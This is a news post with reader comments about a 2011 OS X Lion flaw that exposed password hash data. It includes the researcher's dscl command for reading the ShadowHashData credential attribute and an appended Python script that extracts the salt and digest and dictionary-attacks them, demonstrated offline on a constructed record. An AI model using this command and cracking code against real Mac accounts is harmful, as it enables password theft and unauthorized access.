Aussie Researcher Cracks OS X Lion Passwords
daria42 writes "Thought your Mac was secure running Apple's latest operating system? Think again. Turns out that in some respects Lion is actually less secure than previous versions of Mac OS X, due to some permission-tweaking by Apple that has opened up a way for an attacker to crack your password on your Lion box. The flaw was discovered by an Australian researcher who has previously published a guide to cracking Mac OS X passwords. Sounds like Apple had better get a patch out for this."
http://www.techgineering.org/2011/09/22/2489/a-new-exploit-in-os-x-lion-allows-unauthorized-access-to-users-to-change-password/ - A New Exploit in OS X Lion Allows Unauthorized Access To Users to Change Password
Most common approach to password cracking = brute force, targeting the specific hash (with the specific salt) of the account you're trying to crack. Step one of such an attack = determining the hash and salt that you're targeting. Which is what he figured out. If he's now brute-forcing those hashes, then he absolutely is cracking the passwords (well, he's trying to anyway).
But your basic point is right... he's figured out a way to capture hash/salt data, which he still should not be able to do. Since Lion uses SHA-256 hashes for its shadow file, that cracking attempt is still going to be quite difficult.
The more important part of this article is that under some circumstances, you can change the password of the logged in user without entering the current password. Now, *that* is a big deal (the degree of which is subject to valid debate).
Worst?! XP had that flaw that let you install Vista.
Non impediti ratione cogitationus.
Either it's already been patched, as I'm running the developer builds of 10.7.2, or there's an issue in his particular setup vs. a normal install that's allowing this to happen.
Stepping through the information on his own blog at: http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html
When performing his "dscl localhost -read /Search/Users/" I do NOT get the dsAttrTypeNative:ShadowHashData result UNLESS I have root privileges through sudo. Not even for my own user.
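The two steps the commenters are arguing about (pull the salt and hash out of the ShadowHashData attribute, then run a dictionary attack against them) as an added, self-contained example. This is not code from the page, from the linked write-up, or from Apple; it assumes the Lion layout the linked post describes: ShadowHashData is a binary plist whose SALTED-SHA512 entry is a 4-byte salt followed by SHA-512(salt || password). The dscl output sample is constructed inside the script (the hex grouping and the attribute-name line format are assumptions), so it runs offline with no access to a real Lion directory node.

```python
import hashlib
import plistlib
import re

SALT_LEN = 4      # assumed: first 4 bytes of the SALTED-SHA512 blob are the salt
DIGEST_LEN = 64   # SHA-512 output length


def build_shadow_hash_data(password: str, salt: bytes) -> str:
    """Construct a Lion-style ShadowHashData value for testing.

    Assumption (from the linked write-up): a binary plist containing a dict
    {"SALTED-SHA512": salt || SHA-512(salt || password)}. dscl is assumed to
    print data attributes as whitespace-separated 8-hex-digit groups.
    """
    if len(salt) != SALT_LEN:
        raise ValueError("salt must be %d bytes" % SALT_LEN)
    digest = hashlib.sha512(salt + password.encode("utf-8")).digest()
    blob = plistlib.dumps({"SALTED-SHA512": salt + digest}, fmt=plistlib.FMT_BINARY)
    hexstr = blob.hex()
    return " ".join(hexstr[i:i + 8] for i in range(0, len(hexstr), 8))


def extract_shadow_hash_hex(dscl_output: str) -> str:
    """Pull the hex that follows 'dsAttrTypeNative:ShadowHashData:' in a
    `dscl ... -read` dump. Hex lines are collected until the next line that
    does not look like hex (the next attribute name, or end of output)."""
    lines = dscl_output.splitlines()
    for i, line in enumerate(lines):
        if line.strip() == "dsAttrTypeNative:ShadowHashData:":
            hex_lines = []
            for nxt in lines[i + 1:]:
                if re.fullmatch(r"\s*[0-9a-fA-F ]+\s*", nxt) and nxt.strip():
                    hex_lines.append(nxt)
                else:
                    break
            return " ".join(hex_lines)
    raise ValueError("ShadowHashData attribute not present (no root, or already patched?)")


def parse_shadow_hash_data(hex_text: str):
    """Decode the plist and split the SALTED-SHA512 blob into (salt, digest)."""
    blob = bytes.fromhex(re.sub(r"\s+", "", hex_text))
    plist = plistlib.loads(blob)
    entry = plist["SALTED-SHA512"]
    if len(entry) != SALT_LEN + DIGEST_LEN:
        raise ValueError("unexpected SALTED-SHA512 length %d" % len(entry))
    return entry[:SALT_LEN], entry[SALT_LEN:]


def crack(salt: bytes, digest: bytes, wordlist):
    """Dictionary attack: one unsalted-speed SHA-512 per candidate, because the
    salt is known and there is no iteration count in this scheme."""
    for word in wordlist:
        if hashlib.sha512(salt + word.encode("utf-8")).digest() == digest:
            return word
    return None


def demo() -> str:
    """End to end on a constructed record; returns the recovered password."""
    salt = bytes.fromhex("deadbeef")                      # constructed salt
    record = build_shadow_hash_data("letmein", salt)      # constructed account
    # Constructed dscl -read dump: attribute-name line, then the hex value.
    dscl_output = (
        "dsAttrTypeNative:ShadowHashData:\n"
        " " + record + "\n"
        "dsAttrTypeStandard:UniqueID: 501\n"
    )
    salt_out, digest_out = parse_shadow_hash_data(extract_shadow_hash_hex(dscl_output))
    assert salt_out == salt
    return crack(salt_out, digest_out, ["password", "123456", "qwerty", "letmein"])


if __name__ == "__main__":
    print("recovered:", demo())
```

The point the example makes concrete: once the attribute is readable, the only cost of the attack is one SHA-512 per guess, so the strength of the scheme rests entirely on the read permission the commenters are disputing. If `extract_shadow_hash_hex` raises, the attribute was not in the dump, which is the behaviour the last commenter reports for a non-root read.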